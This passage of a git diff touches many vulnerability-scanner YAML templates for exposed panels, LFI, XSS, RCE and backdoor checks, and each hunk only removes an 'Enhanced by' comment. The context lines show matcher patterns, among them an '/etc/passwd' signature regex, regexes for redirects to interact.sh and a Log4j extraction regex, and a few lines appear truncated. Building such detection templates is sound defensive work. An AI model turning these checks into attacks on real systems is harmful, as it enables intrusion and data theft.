md on 2022/12/05 + diff --git a/http/exposed-panels/drawio-flowchartmaker-panel.yaml b/http/exposed-panels/drawio-flowchartmaker-panel.yaml index 43692840cb..4345c7f526 100644 --- a/http/exposed-panels/drawio-flowchartmaker-panel.yaml +++ b/http/exposed-panels/drawio-flowchartmaker-panel.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/11 + diff --git a/http/exposed-panels/drone-ci-panel.yaml b/http/exposed-panels/drone-ci-panel.yaml index 55ecd91ec9..c24cfc3a5d 100644 --- a/http/exposed-panels/drone-ci-panel.yaml +++ b/http/exposed-panels/drone-ci-panel.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/11 + diff --git a/http/exposed-panels/druid-console-exposure.yaml b/http/exposed-panels/druid-console-exposure.yaml index cba7478099..02939d22d2 100644 --- a/http/exposed-panels/druid-console-exposure.yaml +++ b/http/exposed-panels/druid-console-exposure.yaml @@ -25,4 +25,4 @@ http: - 'href="/druid.css"' condition: and -# Enhanced by md on 2022/11/11 + diff --git a/http/exposed-panels/druid-panel.yaml b/http/exposed-panels/druid-panel.yaml index ce4fd7bf58..c467780d95 100644 --- a/http/exposed-panels/druid-panel.yaml +++ b/http/exposed-panels/druid-panel.yaml @@ -29,4 +29,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/11 + diff --git a/http/exposed-panels/drupal-login.yaml b/http/exposed-panels/drupal-login.yaml index a28fdd9faa..b531e7dd05 100644 --- a/http/exposed-panels/drupal-login.yaml +++ b/http/exposed-panels/drupal-login.yaml @@ -37,4 +37,4 @@ http: - "(?i)x-generator: drupal" condition: or -# Enhanced by md on 2022/11/11 + diff --git a/http/exposed-panels/dynamicweb-panel.yaml b/http/exposed-panels/dynamicweb-panel.yaml index d1e63bb9fb..4c5254d34c 100644 --- a/http/exposed-panels/dynamicweb-panel.yaml +++ b/http/exposed-panels/dynamicweb-panel.yaml @@ -41,4 +41,4 @@ http: regex: - version ([0-9.]+) -# Enhanced by md on 2022/11/11 + diff --git a/http/exposed-panels/dynatrace-panel.yaml b/http/exposed-panels/dynatrace-panel.yaml index 6c36cf29f3..f63c3be79b 100644 --- a/http/exposed-panels/dynatrace-panel.yaml +++ b/http/exposed-panels/dynatrace-panel.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by md on 2023/04/25 + diff --git a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml index ed8e7edf2d..ec683789d5 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by md on 2023/04/25 + diff --git a/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml b/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml index 3493121e66..59e784e1e0 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/11 + diff --git a/http/exposed-panels/e-mobile-panel.yaml b/http/exposed-panels/e-mobile-panel.yaml index 09dee70fec..52951ac516 100644 --- a/http/exposed-panels/e-mobile-panel.yaml +++ b/http/exposed-panels/e-mobile-panel.yaml @@ -43,4 +43,4 @@ http: regex: - 'E-Mobile ([0-9.]+)' -# Enhanced by cs 2023/01/09 + diff --git a/http/exposed-panels/eMerge-panel.yaml b/http/exposed-panels/eMerge-panel.yaml index 40a9395da9..e4153adc99 100644 --- a/http/exposed-panels/eMerge-panel.yaml +++ b/http/exposed-panels/eMerge-panel.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/11 + diff --git a/http/exposed-panels/ecosys-command-center.yaml b/http/exposed-panels/ecosys-command-center.yaml index 77f2877994..54a1bcd5ac 100644 --- a/http/exposed-panels/ecosys-command-center.yaml +++ b/http/exposed-panels/ecosys-command-center.yaml @@ -29,4 +29,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/11 + diff --git a/http/exposed-panels/edgeos-login.yaml b/http/exposed-panels/edgeos-login.yaml index 654d26597f..c701fb72c0 100644 --- a/http/exposed-panels/edgeos-login.yaml +++ b/http/exposed-panels/edgeos-login.yaml @@ -29,4 +29,4 @@ http: status: - 200 -# Enhanced by md on 2023/01/09 + diff --git a/http/exposed-panels/eko-management-console-login.yaml b/http/exposed-panels/eko-management-console-login.yaml index 193b24f226..e3909fec3c 100644 --- a/http/exposed-panels/eko-management-console-login.yaml +++ b/http/exposed-panels/eko-management-console-login.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/14 + diff --git a/http/exposed-panels/eko-software-update-panel.yaml b/http/exposed-panels/eko-software-update-panel.yaml index ccedb757d3..78b62cf91e 100644 --- a/http/exposed-panels/eko-software-update-panel.yaml +++ b/http/exposed-panels/eko-software-update-panel.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/14 + diff --git a/http/exposed-panels/elemiz-network-manager.yaml b/http/exposed-panels/elemiz-network-manager.yaml index 5c3717a6cb..f7bc6efb8a 100644 --- a/http/exposed-panels/elemiz-network-manager.yaml +++ b/http/exposed-panels/elemiz-network-manager.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by md on 2023/04/25 + diff --git a/http/exposed-panels/emby-panel.yaml b/http/exposed-panels/emby-panel.yaml index 06849eebfc..6b1e2c06aa 100644 --- a/http/exposed-panels/emby-panel.yaml +++ b/http/exposed-panels/emby-panel.yaml @@ -44,4 +44,4 @@ http: regex: - '\" keyword') condition: and -# Enhanced by md on 2022/09/20 + diff --git a/http/vulnerabilities/other/hospital-management-xss2.yaml b/http/vulnerabilities/other/hospital-management-xss2.yaml index 84b367db36..f491628c62 100644 --- a/http/vulnerabilities/other/hospital-management-xss2.yaml +++ b/http/vulnerabilities/other/hospital-management-xss2.yaml @@ -45,4 +45,4 @@ http: - contains(body_2, 'Result against \"\" keyword') condition: and -# Enhanced by md on 2022/09/20 + diff --git a/http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml b/http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml index 213cc6c48b..7b1951377c 100644 --- a/http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml +++ b/http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/03 + diff --git a/http/vulnerabilities/other/huawei-hg659-lfi.yaml b/http/vulnerabilities/other/huawei-hg659-lfi.yaml index 7b475bfd2f..3351a064b1 100644 --- a/http/vulnerabilities/other/huawei-hg659-lfi.yaml +++ b/http/vulnerabilities/other/huawei-hg659-lfi.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/03 + diff --git a/http/vulnerabilities/other/huawei-router-auth-bypass.yaml b/http/vulnerabilities/other/huawei-router-auth-bypass.yaml index 3de39f2bc1..2a4665f349 100644 --- a/http/vulnerabilities/other/huawei-router-auth-bypass.yaml +++ b/http/vulnerabilities/other/huawei-router-auth-bypass.yaml @@ -36,4 +36,4 @@ http: - "HardwareVersion" condition: and -# Enhanced by mp on 2022/06/03 + diff --git a/http/vulnerabilities/other/huijietong-cloud-fileread.yaml b/http/vulnerabilities/other/huijietong-cloud-fileread.yaml index c4e34c24aa..b7b54e74dc 100644 --- a/http/vulnerabilities/other/huijietong-cloud-fileread.yaml +++ b/http/vulnerabilities/other/huijietong-cloud-fileread.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/03 + diff --git a/http/vulnerabilities/other/icewarp-open-redirect.yaml b/http/vulnerabilities/other/icewarp-open-redirect.yaml index 67fe3fd2e3..3333feb88b 100644 --- a/http/vulnerabilities/other/icewarp-open-redirect.yaml +++ b/http/vulnerabilities/other/icewarp-open-redirect.yaml @@ -41,4 +41,4 @@ http: regex: - 'Server: (.{4,20})' -# Enhanced by md on 2022/10/18 + diff --git a/http/vulnerabilities/other/icewarp-webclient-rce.yaml b/http/vulnerabilities/other/icewarp-webclient-rce.yaml index f858cc605d..570b76faeb 100644 --- a/http/vulnerabilities/other/icewarp-webclient-rce.yaml +++ b/http/vulnerabilities/other/icewarp-webclient-rce.yaml @@ -35,4 +35,4 @@ http: status: - 302 -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/inspur-clusterengine-rce.yaml b/http/vulnerabilities/other/inspur-clusterengine-rce.yaml index 41981d1ce0..b91d5a387b 100644 --- a/http/vulnerabilities/other/inspur-clusterengine-rce.yaml +++ b/http/vulnerabilities/other/inspur-clusterengine-rce.yaml @@ -43,4 +43,4 @@ http: status: - 200 -# Enhanced by cs 03/27/2023 + diff --git a/http/vulnerabilities/other/interlib-fileread.yaml b/http/vulnerabilities/other/interlib-fileread.yaml index da2e52119e..8aeeb14225 100644 --- a/http/vulnerabilities/other/interlib-fileread.yaml +++ b/http/vulnerabilities/other/interlib-fileread.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/03 + diff --git a/http/vulnerabilities/other/java-melody-xss.yaml b/http/vulnerabilities/other/java-melody-xss.yaml index 8054125a7d..342313efbe 100644 --- a/http/vulnerabilities/other/java-melody-xss.yaml +++ b/http/vulnerabilities/other/java-melody-xss.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by md on 2022/09/20 + diff --git a/http/vulnerabilities/other/jeewms-lfi.yaml b/http/vulnerabilities/other/jeewms-lfi.yaml index 89840dabc1..86c40a6c75 100644 --- a/http/vulnerabilities/other/jeewms-lfi.yaml +++ b/http/vulnerabilities/other/jeewms-lfi.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/03 + diff --git a/http/vulnerabilities/other/jinfornet-jreport-lfi.yaml b/http/vulnerabilities/other/jinfornet-jreport-lfi.yaml index f9442706e3..ae53aebbea 100644 --- a/http/vulnerabilities/other/jinfornet-jreport-lfi.yaml +++ b/http/vulnerabilities/other/jinfornet-jreport-lfi.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/03 + diff --git a/http/vulnerabilities/other/joomla-com-fabrik-lfi.yaml b/http/vulnerabilities/other/joomla-com-fabrik-lfi.yaml index 3fd15b791d..b8fd0f3d10 100644 --- a/http/vulnerabilities/other/joomla-com-fabrik-lfi.yaml +++ b/http/vulnerabilities/other/joomla-com-fabrik-lfi.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/03 + diff --git a/http/vulnerabilities/other/kafdrop-xss.yaml b/http/vulnerabilities/other/kafdrop-xss.yaml index 87ddfb1503..929921c0b8 100644 --- a/http/vulnerabilities/other/kafdrop-xss.yaml +++ b/http/vulnerabilities/other/kafdrop-xss.yaml @@ -34,4 +34,4 @@ http: status: - 500 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/karel-ip-phone-lfi.yaml b/http/vulnerabilities/other/karel-ip-phone-lfi.yaml index 017e09952d..3aceaad6c6 100644 --- a/http/vulnerabilities/other/karel-ip-phone-lfi.yaml +++ b/http/vulnerabilities/other/karel-ip-phone-lfi.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/03 + diff --git a/http/vulnerabilities/other/kavita-lfi.yaml b/http/vulnerabilities/other/kavita-lfi.yaml index 172d1ba808..77032933aa 100644 --- a/http/vulnerabilities/other/kavita-lfi.yaml +++ b/http/vulnerabilities/other/kavita-lfi.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2023/01/15 + diff --git a/http/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/http/vulnerabilities/other/kevinlab-bems-backdoor.yaml index be72d3c7b6..09f15f88d8 100644 --- a/http/vulnerabilities/other/kevinlab-bems-backdoor.yaml +++ b/http/vulnerabilities/other/kevinlab-bems-backdoor.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/kevinlab-bems-sqli.yaml b/http/vulnerabilities/other/kevinlab-bems-sqli.yaml index 675facfe68..68b651d006 100644 --- a/http/vulnerabilities/other/kevinlab-bems-sqli.yaml +++ b/http/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/28 + diff --git a/http/vulnerabilities/other/kevinlab-hems-backdoor.yaml b/http/vulnerabilities/other/kevinlab-hems-backdoor.yaml index 3d804c6bf6..82cd5ae67c 100644 --- a/http/vulnerabilities/other/kevinlab-hems-backdoor.yaml +++ b/http/vulnerabilities/other/kevinlab-hems-backdoor.yaml @@ -45,4 +45,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/keycloak-xss.yaml b/http/vulnerabilities/other/keycloak-xss.yaml index 3696bce174..b8c8935a24 100644 --- a/http/vulnerabilities/other/keycloak-xss.yaml +++ b/http/vulnerabilities/other/keycloak-xss.yaml @@ -34,4 +34,4 @@ http: words: - 'Unrecognized field ""' -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml b/http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml index 03a5295874..8ff6319cc6 100644 --- a/http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml +++ b/http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/03 + diff --git a/http/vulnerabilities/other/kingsoft-v8-file-read.yaml b/http/vulnerabilities/other/kingsoft-v8-file-read.yaml index d1947f70dc..a556dc3472 100644 --- a/http/vulnerabilities/other/kingsoft-v8-file-read.yaml +++ b/http/vulnerabilities/other/kingsoft-v8-file-read.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/03 + diff --git a/http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml b/http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml index 3505c0ddf3..918e16f46d 100644 --- a/http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml +++ b/http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/03 + diff --git a/http/vulnerabilities/other/laravel-filemanager-lfi.yaml b/http/vulnerabilities/other/laravel-filemanager-lfi.yaml index 70a2487679..55fe98d100 100644 --- a/http/vulnerabilities/other/laravel-filemanager-lfi.yaml +++ b/http/vulnerabilities/other/laravel-filemanager-lfi.yaml @@ -30,4 +30,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/27 + diff --git a/http/vulnerabilities/other/loancms-sqli.yaml b/http/vulnerabilities/other/loancms-sqli.yaml index cac86e3b34..ced56f1489 100644 --- a/http/vulnerabilities/other/loancms-sqli.yaml +++ b/http/vulnerabilities/other/loancms-sqli.yaml @@ -48,4 +48,4 @@ http: - 'login-form' negative: true -# Enhanced by mp on 2022/09/28 + diff --git a/http/vulnerabilities/other/lotuscms-rce.yaml b/http/vulnerabilities/other/lotuscms-rce.yaml index bbf99c7f1d..d469d18a4f 100644 --- a/http/vulnerabilities/other/lotuscms-rce.yaml +++ b/http/vulnerabilities/other/lotuscms-rce.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/lucee-xss.yaml b/http/vulnerabilities/other/lucee-xss.yaml index d94810b39a..1dd4708070 100644 --- a/http/vulnerabilities/other/lucee-xss.yaml +++ b/http/vulnerabilities/other/lucee-xss.yaml @@ -32,4 +32,4 @@ http: part: body condition: and -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/maccmsv10-backdoor.yaml b/http/vulnerabilities/other/maccmsv10-backdoor.yaml index e894b76f52..c2fe1dd6eb 100644 --- a/http/vulnerabilities/other/maccmsv10-backdoor.yaml +++ b/http/vulnerabilities/other/maccmsv10-backdoor.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/magicflow-lfi.yaml b/http/vulnerabilities/other/magicflow-lfi.yaml index 4504a53c50..20e85061a0 100644 --- a/http/vulnerabilities/other/magicflow-lfi.yaml +++ b/http/vulnerabilities/other/magicflow-lfi.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/mcafee-epo-rce.yaml b/http/vulnerabilities/other/mcafee-epo-rce.yaml index 5a787f352d..846d24eada 100644 --- a/http/vulnerabilities/other/mcafee-epo-rce.yaml +++ b/http/vulnerabilities/other/mcafee-epo-rce.yaml @@ -30,4 +30,4 @@ http: - "Volume (in drive [A-Z]|Serial Number) is" part: body -# Enhanced by mp on 2022/07/27 + diff --git a/http/vulnerabilities/other/metinfo-lfi.yaml b/http/vulnerabilities/other/metinfo-lfi.yaml index 62ca90d04b..7dc463fa48 100644 --- a/http/vulnerabilities/other/metinfo-lfi.yaml +++ b/http/vulnerabilities/other/metinfo-lfi.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/27 + diff --git a/http/vulnerabilities/other/microweber-xss.yaml b/http/vulnerabilities/other/microweber-xss.yaml index e070bbfc32..6254e9983c 100644 --- a/http/vulnerabilities/other/microweber-xss.yaml +++ b/http/vulnerabilities/other/microweber-xss.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/30 + diff --git a/http/vulnerabilities/other/mida-eframework-xss.yaml b/http/vulnerabilities/other/mida-eframework-xss.yaml index 9f38c1eb8f..5683120283 100644 --- a/http/vulnerabilities/other/mida-eframework-xss.yaml +++ b/http/vulnerabilities/other/mida-eframework-xss.yaml @@ -35,4 +35,4 @@ http: words: - '">' -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/minimouse-lfi.yaml b/http/vulnerabilities/other/minimouse-lfi.yaml index 3f919c4410..fa9ebf208a 100644 --- a/http/vulnerabilities/other/minimouse-lfi.yaml +++ b/http/vulnerabilities/other/minimouse-lfi.yaml @@ -34,4 +34,4 @@ http: condition: and part: body -# Enhanced by mp on 2022/07/27 + diff --git a/http/vulnerabilities/other/mirai-unknown-rce.yaml b/http/vulnerabilities/other/mirai-unknown-rce.yaml index ada89e8a05..c17949c7f7 100644 --- a/http/vulnerabilities/other/mirai-unknown-rce.yaml +++ b/http/vulnerabilities/other/mirai-unknown-rce.yaml @@ -31,4 +31,4 @@ http: words: - "http" -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/mpsec-lfi.yaml b/http/vulnerabilities/other/mpsec-lfi.yaml index d34fade040..dca93e1923 100644 --- a/http/vulnerabilities/other/mpsec-lfi.yaml +++ b/http/vulnerabilities/other/mpsec-lfi.yaml @@ -39,4 +39,4 @@ http: - "text/plain" part: header -# Enhanced by mp on 2022/07/27 + diff --git a/http/vulnerabilities/other/myucms-lfr.yaml b/http/vulnerabilities/other/myucms-lfr.yaml index 209a8152e1..2931ffce47 100644 --- a/http/vulnerabilities/other/myucms-lfr.yaml +++ b/http/vulnerabilities/other/myucms-lfr.yaml @@ -24,4 +24,4 @@ http: regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/07/27 + diff --git a/http/vulnerabilities/other/natshell-path-traversal.yaml b/http/vulnerabilities/other/natshell-path-traversal.yaml index 8c6da98ee5..857db596d5 100644 --- a/http/vulnerabilities/other/natshell-path-traversal.yaml +++ b/http/vulnerabilities/other/natshell-path-traversal.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/27 + diff --git a/http/vulnerabilities/other/natshell-rce.yaml b/http/vulnerabilities/other/natshell-rce.yaml index 32036ef9b8..61181d03ed 100644 --- a/http/vulnerabilities/other/natshell-rce.yaml +++ b/http/vulnerabilities/other/natshell-rce.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/netgear-router-auth-bypass.yaml b/http/vulnerabilities/other/netgear-router-auth-bypass.yaml index 4d8460fdc2..200ecf793a 100644 --- a/http/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/http/vulnerabilities/other/netgear-router-auth-bypass.yaml @@ -38,4 +38,4 @@ http: words: - "WAN Setup" -# Enhanced by md on 2022/10/19 + diff --git a/http/vulnerabilities/other/netgear-router-exposure.yaml b/http/vulnerabilities/other/netgear-router-exposure.yaml index 23c2bb80a3..f94faf8149 100644 --- a/http/vulnerabilities/other/netgear-router-exposure.yaml +++ b/http/vulnerabilities/other/netgear-router-exposure.yaml @@ -47,4 +47,4 @@ http: regex: - "([A-Z0-9]+)<\\/serialNumber>" -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml b/http/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml index 3b719b9db6..cb3a7d6d3f 100644 --- a/http/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml +++ b/http/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml @@ -32,4 +32,4 @@ http: words: - "Enable Telnet" -# Enhanced by md on 2022/10/19 + diff --git a/http/vulnerabilities/other/netis-info-leak.yaml b/http/vulnerabilities/other/netis-info-leak.yaml index 70a3af8299..c3a3814486 100644 --- a/http/vulnerabilities/other/netis-info-leak.yaml +++ b/http/vulnerabilities/other/netis-info-leak.yaml @@ -42,4 +42,4 @@ http: regex: - "'rp_soon_password':'([A-Za-z0-9]+)'" -# Enhanced by cs 03/27/2023 + diff --git a/http/vulnerabilities/other/nextjs-redirect.yaml b/http/vulnerabilities/other/nextjs-redirect.yaml index 933c57843a..257e2826ff 100644 --- a/http/vulnerabilities/other/nextjs-redirect.yaml +++ b/http/vulnerabilities/other/nextjs-redirect.yaml @@ -34,4 +34,4 @@ http: status: - 308 -# Enhanced by cs 03/27/2023 + diff --git a/http/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/http/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml index 4ee19ab922..2fd03d632d 100644 --- a/http/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml +++ b/http/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/27 + diff --git a/http/vulnerabilities/other/nginx-module-vts-xss.yaml b/http/vulnerabilities/other/nginx-module-vts-xss.yaml index 86082f9d03..61a0d6cf18 100644 --- a/http/vulnerabilities/other/nginx-module-vts-xss.yaml +++ b/http/vulnerabilities/other/nginx-module-vts-xss.yaml @@ -36,4 +36,4 @@ http: - "text/html" part: header -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/ns-asg-file-read.yaml b/http/vulnerabilities/other/ns-asg-file-read.yaml index 2fbcb14711..7d3c7ca50e 100644 --- a/http/vulnerabilities/other/ns-asg-file-read.yaml +++ b/http/vulnerabilities/other/ns-asg-file-read.yaml @@ -38,4 +38,4 @@ http: - "application/pdf" condition: and -# Enhanced by mp on 2022/08/03 + diff --git a/http/vulnerabilities/other/nuuo-file-inclusion.yaml b/http/vulnerabilities/other/nuuo-file-inclusion.yaml index ffdf4eff1f..de48bae5e4 100644 --- a/http/vulnerabilities/other/nuuo-file-inclusion.yaml +++ b/http/vulnerabilities/other/nuuo-file-inclusion.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/nuuo-nvrmini2-rce.yaml b/http/vulnerabilities/other/nuuo-nvrmini2-rce.yaml index fdad552435..d439b9640e 100644 --- a/http/vulnerabilities/other/nuuo-nvrmini2-rce.yaml +++ b/http/vulnerabilities/other/nuuo-nvrmini2-rce.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/odoo-cms-redirect.yaml b/http/vulnerabilities/other/odoo-cms-redirect.yaml index 6622ca3496..8353771b1d 100644 --- a/http/vulnerabilities/other/odoo-cms-redirect.yaml +++ b/http/vulnerabilities/other/odoo-cms-redirect.yaml @@ -27,4 +27,4 @@ http: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header -# Enhanced by md on 2022/10/18 + diff --git a/http/vulnerabilities/other/oliver-library-lfi.yaml b/http/vulnerabilities/other/oliver-library-lfi.yaml index 42e300da5c..2bbb7c4b84 100644 --- a/http/vulnerabilities/other/oliver-library-lfi.yaml +++ b/http/vulnerabilities/other/oliver-library-lfi.yaml @@ -30,4 +30,4 @@ http: - "extensions" condition: and -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/onlinefarm-management-xss.yaml b/http/vulnerabilities/other/onlinefarm-management-xss.yaml index 2a666c62b3..7b1d97b597 100644 --- a/http/vulnerabilities/other/onlinefarm-management-xss.yaml +++ b/http/vulnerabilities/other/onlinefarm-management-xss.yaml @@ -44,4 +44,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/opencti-lfi.yaml b/http/vulnerabilities/other/opencti-lfi.yaml index 31c671f77f..56d9291105 100644 --- a/http/vulnerabilities/other/opencti-lfi.yaml +++ b/http/vulnerabilities/other/opencti-lfi.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml index 97b57f5151..6d96e04bbb 100644 --- a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml @@ -64,4 +64,4 @@ http: regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output -# Enhanced by cs on 2022/10/23 + diff --git a/http/vulnerabilities/other/opensis-lfi.yaml b/http/vulnerabilities/other/opensis-lfi.yaml index 191298a681..7ad4961252 100644 --- a/http/vulnerabilities/other/opensis-lfi.yaml +++ b/http/vulnerabilities/other/opensis-lfi.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/opensns-rce.yaml b/http/vulnerabilities/other/opensns-rce.yaml index 53499b2348..b7005911a2 100644 --- a/http/vulnerabilities/other/opensns-rce.yaml +++ b/http/vulnerabilities/other/opensns-rce.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml b/http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml index d98413b682..dd2ef2a58d 100644 --- a/http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml +++ b/http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml @@ -36,4 +36,4 @@ http: words: - "http" -# Enhanced by mp on 2022/04/01 + diff --git a/http/vulnerabilities/other/oracle-fatwire-lfi.yaml b/http/vulnerabilities/other/oracle-fatwire-lfi.yaml index ce29c7e368..dcca8ff7d9 100644 --- a/http/vulnerabilities/other/oracle-fatwire-lfi.yaml +++ b/http/vulnerabilities/other/oracle-fatwire-lfi.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml b/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml index 9114703b09..ca46397a28 100644 --- a/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml +++ b/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/otobo-open-redirect.yaml b/http/vulnerabilities/other/otobo-open-redirect.yaml index a6075f6d15..8652d1a12e 100644 --- a/http/vulnerabilities/other/otobo-open-redirect.yaml +++ b/http/vulnerabilities/other/otobo-open-redirect.yaml @@ -27,4 +27,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by md on 2022/10/18 + diff --git a/http/vulnerabilities/other/pacsone-server-lfi.yaml b/http/vulnerabilities/other/pacsone-server-lfi.yaml index 9f49294409..7becc54d93 100644 --- a/http/vulnerabilities/other/pacsone-server-lfi.yaml +++ b/http/vulnerabilities/other/pacsone-server-lfi.yaml @@ -30,4 +30,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/parallels-hsphere-xss.yaml b/http/vulnerabilities/other/parallels-hsphere-xss.yaml index 8d20531eaa..fc180911f1 100644 --- a/http/vulnerabilities/other/parallels-hsphere-xss.yaml +++ b/http/vulnerabilities/other/parallels-hsphere-xss.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/parentlink-xss.yaml b/http/vulnerabilities/other/parentlink-xss.yaml index c5ba4a6043..1d23c1acfc 100644 --- a/http/vulnerabilities/other/parentlink-xss.yaml +++ b/http/vulnerabilities/other/parentlink-xss.yaml @@ -38,4 